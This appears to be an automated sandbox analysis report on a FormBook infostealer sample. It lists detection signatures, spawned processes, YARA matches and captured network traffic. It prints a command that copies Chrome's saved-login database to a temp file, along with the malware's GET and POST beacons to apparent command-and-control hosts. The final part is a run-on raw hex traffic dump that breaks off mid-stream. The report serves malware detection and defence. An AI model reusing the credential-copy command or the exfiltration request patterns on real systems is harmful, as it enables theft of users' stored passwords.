# Analysis Report RFQ.exe.vir

## Overview

### General Information

- Sample Name: RFQ.exe.vir (renamed file extension from vir to exe)
- MD5: 22dc43ed0fab2aca044494cefd0fa2c7
- SHA1: e47f39003136287190b347f784122110a12700ed
- SHA256: faebab8e94693d16273dfd699a3d5067a241b3d544de0a47dd52008ae782c18d

### Detection

- Family: FormBook
- Score: 100 (Range: 0 - 100)
- Whitelisted: false
- Confidence: 100%

### Signatures

- Antivirus / Scanner detection for submitted sample
- Antivirus detection for dropped file
- Benign windows process drops PE files
- Detected FormBook malware
- Malicious sample detected (through community Yara rule)
- Multi AV Scanner detection for domain / URL
- Multi AV Scanner detection for dropped file
- Multi AV Scanner detection for submitted file
- System process connects to network (likely due to code injection or exploit)
- Yara detected FormBook
- Binary is likely a compiled AutoIt script file
- Injects a PE file into a foreign process
- Maps a DLL or memory area into another process
- Modifies the prolog of user mode functions (user mode inline hooks)
- Queues an APC in another process (thread injection)
- Sample uses process hollowing technique
- Tries to detect virtualization through RDTSC time measurements
- Tries to harvest and steal browser information (history, passwords, etc)
- Tries to steal Mail credentials (via file access)
- Antivirus or Machine Learning detection for unpacked file
- Checks if the current process is being debugged
- Contains functionality for execution timing, often used to detect debuggers
- Contains functionality to read data from the clipboard
- Contains functionality to block mouse and keyboard input (often used to hinder debugging)
- Contains functionality to call native functions
- Contains functionality to check if a debugger is running (IsDebuggerPresent)
- Contains functionality to check if a debugger is running (OutputDebugString, GetLastError)
- Contains functionality to check if a window is minimized (may be used to check if an application is visible)
- Contains functionality to communicate with device drivers
- Contains functionality to dynamically determine API calls
- Contains functionality to execute programs as a different user
- Contains functionality to launch a process as a different user
- Contains functionality to launch a program with higher privileges
- Contains functionality to query CPU information (cpuid)
- Contains functionality to read the PEB
- Contains functionality to read the clipboard data
- Contains functionality to retrieve information about pressed keystrokes
- Contains functionality to shutdown / reboot the system
- Contains functionality to simulate keystroke presses
- Contains functionality to simulate mouse events
- Contains functionality which may be used to detect a debugger (GetProcessHeap)
- Creates a process in suspended mode (likely to inject code)
- Detected potential crypto function
- Drops PE files
- Enables debug privileges
- Extensive use of GetProcAddress (often used to hide API calls)
- Found inlined nop instructions (likely shell or obfuscated code)
- Found large amount of non-executed APIs
- Found potential string decryption / allocating functions
- HTTP GET or POST without a user agent
- IP address seen in connection with other malware
- Internet Provider seen in connection with other malware
- May sleep (evasive loops) to hinder dynamic analysis
- OS version to string mapping found (often used in BOTs)
- PE file contains strange resources
- Potential key logger detected (key state polling based)
- Queries the volume information (name, serial number etc) of a device
- Sample execution stops while process was sleeping (likely an evasion)
- Sample file is different than original file name gathered from version info
- Uses a known web browser user agent for HTTP communication
- Uses code obfuscation techniques (call, push, ret)
- Yara signature match

### Classification

System is w10x64. Processes observed:

- RFQ.exe.exe (PID: 4996, cmdline: `'C:\Users\user\Desktop\RFQ.exe.exe'`, MD5: 22DC43ED0FAB2ACA044494CEFD0FA2C7)
- RFQ.exe.exe (PID: 5408, cmdline: `C:\Users\user\Desktop\RFQ.exe.exe`, MD5: 22DC43ED0FAB2ACA044494CEFD0FA2C7)
- RFQ.exe.exe (PID: 4068, cmdline: `C:\Users\user\Desktop\RFQ.exe.exe`, MD5: 22DC43ED0FAB2ACA044494CEFD0FA2C7)
- RFQ.exe.exe (PID: 2300, cmdline: `C:\Users\user\Desktop\RFQ.exe.exe`, MD5: 22DC43ED0FAB2ACA044494CEFD0FA2C7)
- explorer.exe (PID: 2928, cmdline: (empty), MD5: E4A81EDDFF8B844D85C8B45354E4144E)
- cmd.exe (PID: 5640, cmdline: `C:\Windows\SysWOW64\cmd.exe`, MD5: F3BDBE3BB6F734E357235F4D5898582D)
- cmd.exe (PID: 5872, cmdline: `/c del 'C:\Users\user\Desktop\RFQ.exe.exe'`, MD5: F3BDBE3BB6F734E357235F4D5898582D)
- conhost.exe (PID: 5856, cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1`, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- cmd.exe (PID: 5452, cmdline: `/c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V`, MD5: F3BDBE3BB6F734E357235F4D5898582D)
- conhost.exe (PID: 5536, cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1`, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- ebplgh1bmx.exe (PID: 2464, cmdline: `C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe`, MD5: 22DC43ED0FAB2ACA044494CEFD0FA2C7)
- ebplgh1bmx.exe (PID: 5728, cmdline: `C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe`, MD5: 22DC43ED0FAB2ACA044494CEFD0FA2C7)
- cmmon32.exe (PID: 2644, cmdline: `C:\Windows\SysWOW64\cmmon32.exe`, MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)

## Malware Configuration

No configs have been found
### Yara Matches

Memory dumps (type: MEMORY):

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| 0000001E.00000002.1280450173.0000000002550000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security | |
| 0000001E.00000002.1280450173.0000000002550000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group | `0x18429:$sqlite3step: 68 34 1C 7B E1`; `0x1853c:$sqlite3step: 68 34 1C 7B E1`; `0x18458:$sqlite3text: 68 38 2A 90 C5`; `0x1857d:$sqlite3text: 68 38 2A 90 C5`; `0x1846b:$sqlite3blob: 68 53 D8 7F 8C`; `0x18593:$sqlite3blob: 68 53 D8 7F 8C` |
| 0000001E.00000002.1280450173.0000000002550000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com | `0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC`; `0x9b22:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC`; `0x157a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94`; `0x15291:$sequence_2: 3B 4F 14 73 95 85 C9 74 91`; `0x158a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F`; `0x15a1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07`; `0xa69a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06`; `0x1450c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8`; `0xb393:$sequence_7: 66 89 0C 02 5B 8B E5 5D`; `0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4`; `0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00` |
| 0000001D.00000002.1277991458.0000000000DD0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security | |
| 0000001D.00000002.1277991458.0000000000DD0000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group | `0x18429:$sqlite3step: 68 34 1C 7B E1`; `0x1853c:$sqlite3step: 68 34 1C 7B E1`; `0x18458:$sqlite3text: 68 38 2A 90 C5`; `0x1857d:$sqlite3text: 68 38 2A 90 C5`; `0x1846b:$sqlite3blob: 68 53 D8 7F 8C`; `0x18593:$sqlite3blob: 68 53 D8 7F 8C` |

The report contains 16 memory-dump entries in total; the first five are shown above.

Unpacked PE files (type: UNPACKEDPE):

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| 29.2.ebplgh1bmx.exe.400000.1.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security | |
| 29.2.ebplgh1bmx.exe.400000.1.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group | `0x17629:$sqlite3step: 68 34 1C 7B E1`; `0x1773c:$sqlite3step: 68 34 1C 7B E1`; `0x17658:$sqlite3text: 68 38 2A 90 C5`; `0x1777d:$sqlite3text: 68 38 2A 90 C5`; `0x1766b:$sqlite3blob: 68 53 D8 7F 8C`; `0x17793:$sqlite3blob: 68 53 D8 7F 8C` |
| 29.2.ebplgh1bmx.exe.400000.1.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com | `0x8ab8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC`; `0x8d22:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC`; `0x149a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94`; `0x14491:$sequence_2: 3B 4F 14 73 95 85 C9 74 91`; `0x14aa7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F`; `0x14c1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07`; `0x989a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06`; `0x1370c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8`; `0xa593:$sequence_7: 66 89 0C 02 5B 8B E5 5D`; `0x19d17:$sequence_8: 3C 54 74 04 3C 74 75 F4`; `0x1ad1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00` |
| 8.2.RFQ.exe.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security | |
| 8.2.RFQ.exe.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group | `0x17629:$sqlite3step: 68 34 1C 7B E1`; `0x1773c:$sqlite3step: 68 34 1C 7B E1`; `0x17658:$sqlite3text: 68 38 2A 90 C5`; `0x1777d:$sqlite3text: 68 38 2A 90 C5`; `0x1766b:$sqlite3blob: 68 53 D8 7F 8C`; `0x17793:$sqlite3blob: 68 53 D8 7F 8C` |

## Sigma Overview

### System Summary:

Source: Process started. Author: Joe Security. Data:

- Command: `/c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V`
- CommandLine: `/c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V`
- CommandLine|base64offset|contains: (empty)
- Image: `C:\Windows\SysWOW64\cmd.exe`
- NewProcessName: `C:\Windows\SysWOW64\cmd.exe`
- OriginalFileName: `C:\Windows\SysWOW64\cmd.exe`
- ParentCommandLine: `C:\Windows\SysWOW64\cmd.exe`
- ParentImage: `C:\Windows\SysWOW64\cmd.exe`
- ParentProcessId: 5640
- ProcessCommandLine: `/c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V`
- ProcessId: 5452

## Signature Overview

### AV Detection:

Antivirus / Scanner detection for submitted sample

- Source: RFQ.exe.exe; Avira: detected

Antivirus detection for dropped file

- Source: `C:\Users\user\AppData\Local\Temp\Wajuduf\ebplgh1bmx.exe`; Avira: detection malicious, Label: HEUR/AGEN.1046691

Multi AV Scanner detection for domain / URL

- Source: http://www.artiyonq.com/m8l/; Virustotal: Detection: 6%

Multi AV Scanner detection for dropped file

- Source: `C:\Users\user\AppData\Local\Temp\Wajuduf\ebplgh1bmx.exe`; Virustotal: Detection: 68%
- Source: `C:\Users\user\AppData\Local\Temp\Wajuduf\ebplgh1bmx.exe`; ReversingLabs: Detection: 62%

Multi AV Scanner detection for submitted file

- Source: RFQ.exe.exe; Virustotal: Detection: 68%
- Source: RFQ.exe.exe; ReversingLabs: Detection: 62%

Yara detected FormBook (Source: Yara match; file sources):

- 0000001E.00000002.1280450173.0000000002550000.00000040.00000001.sdmp, type: MEMORY
- 0000001D.00000002.1277991458.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY
- 0000001D.00000002.1278238054.0000000001400000.00000040.00000001.sdmp, type: MEMORY
- 00000008.00000002.881220627.00000000007D0000.00000040.00000001.sdmp, type: MEMORY
- 00000008.00000002.882704990.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
- 0000001D.00000002.1277745187.0000000000401000.00000020.00000001.sdmp, type: MEMORY
- 00000008.00000002.880507060.0000000000401000.00000020.00000001.sdmp, type: MEMORY
- 29.2.ebplgh1bmx.exe.400000.1.unpack, type: UNPACKEDPE
- 8.2.RFQ.exe.exe.400000.0.unpack, type: UNPACKEDPE

Antivirus or Machine Learning detection for unpacked file

- Source: 29.2.ebplgh1bmx.exe.400000.1.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
- Source: 8.2.RFQ.exe.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen

Contains functionality to enumerate / list files inside a directory

Source: `C:\Users\user\Desktop\RFQ.exe.exe`; code functions:

- 6_2_00E360DD: _wcscat, _wcscat, __wsplitpath, FindFirstFileW, DeleteFileW, _wcscpy, _wcscat, _wcscat, lstrcmpiW, DeleteFileW, MoveFileW, MoveFileW, CopyFileW, DeleteFileW, CopyFileW, FindNextFileW, FindClose, FindClose
- 6_2_00E363F9: _wcscat, __wsplitpath, FindFirstFileW, _wcscpy, _wcscat, _wcscat, DeleteFileW, FindNextFileW, FindClose
- 6_2_00E3EB60: FindFirstFileW, _wcscmp, _wcscmp, FindNextFileW, FindClose
- 6_2_00E36CA9: GetFileAttributesW, FindFirstFileW, FindClose
- 6_2_00E3F5FA: FindFirstFileW, FindClose, FileTimeToLocalFileTime, FileTimeToLocalFileTime, FileTimeToLocalFileTime, FileTimeToSystemTime, __swprintf, __swprintf, __swprintf, __swprintf, __swprintf, __swprintf, __swprintf
- 6_2_00E3F56F: FindFirstFileW, FindClose
- 6_2_00E41B2F: SetCurrentDirectoryW, FindFirstFileW, FindFirstFileW, _wcscmp, _wcscmp, GetFileAttributesW, SetFileAttributesW, FindNextFileW, FindClose, FindFirstFileW, SetCurrentDirectoryW, _wcscmp, _wcscmp, SetCurrentDirectoryW, SetCurrentDirectoryW, FindNextFileW, FindClose, FindClose
- 6_2_00E41C8A: SetCurrentDirectoryW, FindFirstFileW, FindFirstFileW, _wcscmp, _wcscmp, FindNextFileW, FindClose, FindFirstFileW, SetCurrentDirectoryW, _wcscmp, _wcscmp, SetCurrentDirectoryW, SetCurrentDirectoryW, FindNextFileW, FindClose, FindClose
- 6_2_00E41F94: FindFirstFileW, Sleep, _wcscmp, _wcscmp, FindNextFileW, FindClose

Found inlined nop instructions (likely shell or obfuscated code)

- Source: `C:\Users\user\Desktop\RFQ.exe.exe`; code function: 4x nop then pop ebx (8_2_00407AC5)
- Source: `C:\Users\user\Desktop\RFQ.exe.exe`; code function: 4x nop then pop esi (8_2_00417373)
- Source: `C:\Users\user\Desktop\RFQ.exe.exe`; code function: 4x nop then pop edi (8_2_00416D3D)
- Source: `C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe`; code function: 4x nop then pop ebx (29_2_00407AC5)
- Source: `C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe`; code function: 4x nop then pop esi (29_2_00417373)
- Source: `C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe`; code function: 4x nop then pop edi (29_2_00416D3D)
- Source: `C:\Windows\SysWOW64\cmmon32.exe`; code function: 4x nop then pop esi (30_2_02567373)
- Source: `C:\Windows\SysWOW64\cmmon32.exe`; code function: 4x nop then pop edi (30_2_02566D3D)

HTTP GET or POST without a user agent

Source: global traffic; HTTP traffic detected (each request carries `Connection: close` and a body of seven null bytes, `00 00 00 00 00 00 00`, with an empty ASCII rendering):

- `GET /m8l/?tVT=stAPCawU9FsBsDeLDlqawFgIxU41y6VpxlOSmtpgZq2QqlgInUNCOlYAlNLBb+BUECvq&MR-p=0tPLH85x-lH HTTP/1.1`, Host: www.kmwhbl.com
- `GET /m8l/?tVT=lki1ed3GPMN5Nw1jaHFlS3B9RQB9zvXEK7YHw36ZfVLkkOoQWGs0VMlLDODNdBIBI6zD&MR-p=0tPLH85x-lH HTTP/1.1`, Host: www.addis.tech
- `GET /m8l/?MR-p=0tPLH85x-lH&tVT=ovbFtOa4uTjd1a92oYI1beIGZw7s4qusWsZU0rgv2nLP+ugoFD+dLAFKen/jDfcukVqZ HTTP/1.1`, Host: www.nusaliterainspirasi.com
- `GET /m8l/?MR-p=0tPLH85x-lH&tVT=PZkH6llHoqFvvgYvV7p0jyJ4zE2wugCWkpTMu12MC83jrlv2PlfP15O4FxttxOVUzuUw HTTP/1.1`, Host: www.teccommunications.com
- `GET /m8l/?tVT=HCt+Yhx/h4l+FCj3nKRKOvS7Xa1e0tc/Egfr+bgHKkeQjLAOt82B/JBt+eO2F9D4/3gd&MR-p=0tPLH85x-lH HTTP/1.1`, Host: www.obsoletelabs.com
- `GET /m8l/?tVT=5W/5kEIdtxVt3n/xoeTRd2P1yDG4A43nFAD006cGMUhROXoTda6GZj7hA5S0bqxvW5XG&MR-p=0tPLH85x-lH HTTP/1.1`, Host: www.artiyonq.com
- `GET /m8l/?MR-p=0tPLH85x-lH&tVT=dcH6q++BfneLHwYr+7wkAtOqeHmKUMZpIhb6VvBnwf4Bd/1QFFGV2dHI+mdn934ofCRD HTTP/1.1`, Host: www.tgers.com
- `GET /m8l/?tVT=stAPCawU9FsBsDeLDlqawFgIxU41y6VpxlOSmtpgZq2QqlgInUNCOlYAlNLBb+BUECvq&MR-p=0tPLH85x-lH HTTP/1.1`, Host: www.kmwhbl.com
- `GET /m8l/?MR-p=0tPLH85x-lH&tVT=ovbFtOa4uTjd1a92oYI1beIGZw7s4qusWsZU0rgv2nLP+ugoFD+dLAFKen/jDfcukVqZ HTTP/1.1`, Host: www.nusaliterainspirasi.com
IP address seen in connection with other malware

- Source: Joe Sandbox View; IP Address: 52.58.78.16

Internet Provider seen in connection with other malware

- Source: Joe Sandbox View; ASN Name: unknown (three entries)
Uses a known web browser user agent for HTTP communication

Source: global traffic; HTTP traffic detected. Every POST below is `POST /m8l/ HTTP/1.1` with the same header set apart from the host-specific values:

- Connection: close
- Cache-Control: no-cache
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
- Content-Type: application/x-www-form-urlencoded
- Accept: */*
- Accept-Language: en-US
- Accept-Encoding: gzip, deflate
- Origin: http://<Host>
- Referer: http://<Host>/m8l/

The body of each request is a single urlencoded `tVT=` form field (the raw and ASCII body dumps are not reproduced here).

| Host | Content-Length |
|---|---|
| www.addis.tech | 409 |
| www.nusaliterainspirasi.com | 409 |
| www.nusaliterainspirasi.com | 142745 |
| www.teccommunications.com | 409 |
| www.teccommunications.com | 142745 |
| www.obsoletelabs.com | 409 |
| www.obsoletelabs.com | 142745 |
| www.artiyonq.com | 409 |
tVT=x0zD6gpMvRVln1(e15OIBWzOkya3GLnAZlj2moU-O2JBA3YvULHhbDDga6nOe_dkOqa929YTHvbkqoXyBbChdF4CqN~kxXIH~xWsu9yIrxLNWgheelhvrzETlXt4s-6JQPRKICu2ygBmL_D1PPTmLxkyoukPPeeI6nKydM4KiV4sDfnWMW06Brbr~qW-GVnLxjigKhM7oWhOzmABnlnrXEc4geLFh7OOUAvo8eikffcrPyviAABO0E4sJnfeT6r6ZAZ6iDIyDTdSmq9Mprm79ImaDfJTJFKYcqLVr3TpsTE-tY8C2hU9vND6kNBmwORlly~ty5twXUvDKkWm9YDkrDR2Lrl0Aik69JP14eJ2ucoEoOhoJ0fAbqv706Z_wTO6vps6mkclKpqtQNiZuw).bjHW5G0 Source: global traffic HTTP traffic detected: POST /m8l/ HTTP/1.1Host: www.artiyonq.comConnection: closeContent-Length: 142745Cache-Control: no-cacheOrigin: http://www.artiyonq.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.artiyonq.com/m8l/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 74 56 54 3d 78 30 7a 44 36 6b 31 79 70 77 45 35 6a 41 54 57 6b 36 69 70 4d 6d 72 4d 69 53 65 7a 50 38 4c 36 51 56 4f 70 6d 70 45 36 45 6b 78 70 4b 33 45 76 53 4a 28 69 57 44 44 68 63 36 6e 4e 61 5f 5a 63 48 59 71 31 32 38 64 49 48 76 44 72 6a 4f 72 33 47 4c 43 4d 62 6b 46 78 6a 70 57 5f 78 53 49 59 7e 55 48 5f 6c 74 7e 49 6d 68 54 50 54 42 77 4d 5a 68 78 77 6d 69 6f 61 32 47 55 38 72 49 7a 30 52 70 5a 6f 5a 47 6d 34 33 57 41 6f 4f 38 72 64 59 6f 33 35 42 42 77 35 32 35 73 51 53 74 37 44 37 69 7e 51 42 35 4d 4e 7e 31 78 38 49 34 61 6c 4b 69 73 74 48 34 44 56 7e 73 57 49 63 54 50 67 31 68 47 6f 47 77 78 75 6a 48 31 4d 28 30 6f 4a 77 51 54 61 52 46 4e 69 38 75 37 56 32 62 54 55 59 6d 71 31 68 72 43 66 64 4b 73 64 48 69 66 57 4e 33 5a 57 39 6e 67 54 4f 67 69 63 64 4c 4c 69 61 43 31 4d 28 7a 4a 55 46 54 64 6b 74 49 30 73 34 35 4b 77 7a 35 57 34 48 59 74 4b 4f 52 28 71 66 6f 28 5a 6c 7a 7a 71 71 6a 73 69 34 5f 77 2d 38 69 34 79 28 66 66 5a 73 74 42 31 72 38 35 73 6c 79 7e 4c 79 34 74 65 57 6b 4c 44 4c 77 43 50 39 37 37 77 28 7a 52 5f 4a 62 31 79 5a 69 6f 55 39 4e 72 31 35 73 52 63 76 76 49 45 69 5f 78 72 4a 57 6e 41 64 61 76 37 39 61 59 39 31 7a 37 
72 74 4f 38 67 74 46 4e 79 44 73 57 2d 52 64 44 7a 7e 77 64 61 43 5f 7e 79 37 43 4e 51 59 41 53 56 4b 50 7e 4f 32 48 48 6b 51 67 65 61 6c 2d 32 61 72 70 35 75 44 39 35 4a 39 52 53 70 68 56 4f 4a 54 52 4a 52 66 43 64 58 39 66 32 78 5a 35 45 6a 32 65 43 74 59 41 6d 39 50 67 48 4a 4c 71 46 54 39 4e 6e 38 55 4a 6c 67 6a 37 67 68 7e 34 67 52 75 75 42 45 46 6b 33 63 6e 66 51 34 38 31 35 56 49 78 54 44 37 4f 55 52 46 6a 65 46 7a 5a 72 6b 7a 42 75 5f 38 44 42 42 71 61 55 58 38 42 49 70 51 73 73 58 51 62 51 6b 49 31 59 69 37 43 57 42 67 77 7e 72 44 72 62 5f 35 62 58 5f 38 56 52 51 4e 38 42 64 28 58 4f 66 43 46 61 61 35 66 58 77 4e 4a 37 65 6a 65 45 47 78 46 36 76 74 74 68 59 48 39 7a 59 28 73 61 68 59 41 73 78 4d 36 6b 33 4b 70 69 44 6c 71 4b 46 71 4f 72 55 77 4a 31 62 7e 6c 62 4d 69 67 74 6f 6b 33 55 50 34 34 45 70 33 6f 69 47 57 78 55 45 7e 69 30 44 54 58 53 31 30 65 51 43 42 5f 75 57 55 45 48 6f 36 5f 77 7a 63 77 77 6e 56 51 73 68 55 38 37 6d 61 41 72 5a 5a 47 54 66 73 4e 6a 70 4f 77 72 7a 42 6e 69 72 51 69 7e 6a 64 79 4a 79 53 6f 33 36 37 47 70 63 49 6d 72 31 56 50 38 72 75 48 30 32 76 6c 30 67 6f 62 47 42 62 34 64 4e 31 48 51 74 43 4a 76 70 54 58 61 61 68 79 36 50 78 64 68 33 77 6c 78 71 61 41 50 77 75 65 37 7a 72 4f 75 47 28 57 69 4f 6b 44 58 6d 56 2d 6a 36 41 4d 63 6c 33 6e 31 33 30 76 63 58 47 6d 6e 67 71 67 62 42 64 6e 54 70 77 65 6e 6e 42 50 70 50 6e 63 57 51 51 37 56 42 46 56 47 4e 32 75 4d 35 7a 52 75 66 55 6c 6 Source: global traffic HTTP traffic detected: POST /m8l/ HTTP/1.1Host: www.tgers.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.tgers.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.tgers.com/m8l/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 74 56 54 3d 56 2d 4c 41 30 59 58 57 43 57 4f 46 62 6a 52 64 7e 74 30 39 57 4b 4f 45 51 33 69 58 64 74 6c 33 54 78 4c 35 54 5f 68 62 30 4b 4d 6a 50 74 
35 59 50 6d 66 51 7a 59 4f 50 6a 58 39 6b 36 32 63 7a 44 42 41 6e 61 58 75 5f 41 6a 66 55 67 7a 42 5a 52 73 47 71 30 52 6f 30 63 47 4f 4c 4e 64 45 41 6f 74 33 34 61 33 49 2d 49 54 50 52 4f 74 4b 4a 6d 39 6b 30 6a 66 32 38 4d 71 51 51 70 54 50 74 79 50 7a 75 36 4f 6d 7a 6b 6c 6c 50 75 37 4a 38 54 6b 33 76 56 37 70 37 62 70 68 4c 67 48 68 65 51 4f 45 42 7a 54 38 67 57 4d 67 76 4e 41 72 57 28 72 31 34 47 37 42 52 54 57 6a 52 5a 69 47 51 6b 39 6e 48 45 59 7a 59 6a 64 66 56 42 43 7a 73 6a 61 72 33 66 74 65 30 6e 59 61 47 6c 65 4e 65 62 4c 55 38 79 58 69 39 77 43 38 76 73 67 69 51 78 66 5a 41 4a 48 61 66 45 36 52 2d 50 52 53 72 6f 48 4a 41 47 39 75 52 39 4e 5a 55 75 44 33 53 34 33 54 68 37 55 58 5a 74 56 34 6e 42 49 72 79 35 32 46 49 55 62 7e 38 46 73 4f 55 64 59 57 78 7a 2d 53 30 4a 34 73 49 6a 66 50 61 47 72 41 74 4a 47 62 58 73 79 4e 6d 65 53 73 45 74 38 68 5f 34 4b 4d 4f 34 61 78 63 54 33 45 36 43 74 6d 32 32 35 32 32 71 78 7a 38 71 44 58 76 50 45 69 39 4a 6a 30 79 6d 52 79 61 42 38 6e 70 78 31 33 73 50 54 39 6d 38 35 4f 53 76 75 48 77 62 69 6e 6e 65 77 29 2e 00 51 4e 69 5a 75 77 29 Data Ascii: tVT=V-LA0YXWCWOFbjRd~t09WKOEQ3iXdtl3TxL5T_hb0KMjPt5YPmfQzYOPjX9k62czDBAnaXu_AjfUgzBZRsGq0Ro0cGOLNdEAot34a3I-ITPROtKJm9k0jf28MqQQpTPtyPzu6OmzkllPu7J8Tk3vV7p7bphLgHheQOEBzT8gWMgvNArW(r14G7BRTWjRZiGQk9nHEYzYjdfVBCzsjar3fte0nYaGleNebLU8yXi9wC8vsgiQxfZAJHafE6R-PRSroHJAG9uR9NZUuD3S43Th7UXZtV4nBIry52FIUb~8FsOUdYWxz-S0J4sIjfPaGrAtJGbXsyNmeSsEt8h_4KMO4axcT3E6Ctm22522qxz8qDXvPEi9Jj0ymRyaB8npx13sPT9m85OSvuHwbinnew).QNiZuw) Source: global traffic HTTP traffic detected: POST /m8l/ HTTP/1.1Host: www.tgers.comConnection: closeContent-Length: 142745Cache-Control: no-cacheOrigin: http://www.tgers.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.tgers.com/m8l/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 74 56 54 3d 56 2d 4c 41 30 62 48 61 44 6e 66 64 66 51 34 71 
32 2d 5a 76 66 36 47 4b 53 47 57 51 44 4e 64 4a 65 47 61 6b 54 5f 52 66 68 5f 51 58 63 65 78 59 4a 6b 33 58 37 59 4f 49 6c 58 39 6c 7e 32 41 4c 4d 41 6b 76 61 56 43 52 41 6c 48 4c 79 77 70 57 52 38 47 39 30 77 55 45 61 43 6d 51 4e 62 4e 51 72 50 62 65 66 33 30 2d 47 48 62 54 42 70 50 56 6a 5f 41 72 74 50 36 35 4b 75 55 4a 70 68 37 5f 77 76 71 42 72 4c 47 78 31 44 4e 59 69 62 34 72 58 33 58 6b 4c 37 74 32 43 61 63 50 71 41 51 58 44 36 51 6e 71 78 55 6e 55 38 35 73 49 43 7a 6b 76 4a 5a 42 56 36 52 46 54 56 54 72 55 78 43 37 31 73 37 66 47 70 76 2d 6f 49 28 58 66 46 76 4f 6f 35 4f 46 5a 74 4f 62 36 6f 71 6a 32 65 68 48 61 4a 38 57 38 57 36 57 79 33 55 64 6e 77 54 77 77 35 55 44 4c 48 71 67 63 74 46 74 46 6c 75 6a 72 42 52 36 43 64 75 71 37 4e 5a 69 36 32 37 44 39 54 33 55 34 45 6d 34 6e 30 78 7a 4e 38 62 39 38 30 42 36 65 61 71 35 47 64 6d 49 56 4c 75 6a 35 5f 47 5f 49 62 78 6a 36 76 4f 62 4d 4e 39 41 4a 47 62 31 73 33 31 59 65 6a 34 45 73 6f 30 6b 34 6f 6b 38 76 4b 78 42 51 6d 30 34 4a 2d 43 6d 32 35 4f 32 72 45 50 47 72 77 48 76 59 42 75 2d 4a 43 30 79 6e 42 79 61 49 63 6d 78 32 31 75 54 4e 57 70 5f 34 62 72 48 73 72 36 58 4e 47 79 62 47 6e 4a 55 7e 76 32 35 47 59 4b 72 59 51 71 57 58 5f 36 4d 72 7a 41 4a 28 4b 6e 41 54 69 65 76 67 5f 6c 4c 42 63 4f 58 47 31 4d 43 62 39 42 58 61 67 47 55 48 35 35 79 61 4a 6f 34 38 6b 34 71 38 70 6d 67 43 58 28 73 46 57 63 5f 34 71 61 32 38 71 53 37 62 2d 6c 35 28 57 41 68 72 66 4d 2d 4b 65 67 4c 74 64 6d 70 76 74 56 4d 43 46 7e 75 68 78 6b 5f 6a 68 50 71 34 69 75 51 62 4a 66 36 7e 49 31 64 70 6c 61 67 6d 56 52 53 46 39 59 59 6c 39 31 78 61 43 52 62 76 70 53 61 7a 72 74 30 37 5a 66 54 50 42 32 62 72 70 46 6f 39 6e 54 56 54 33 72 6f 6e 45 63 38 44 76 36 41 7e 73 78 4b 55 76 79 43 61 77 6f 34 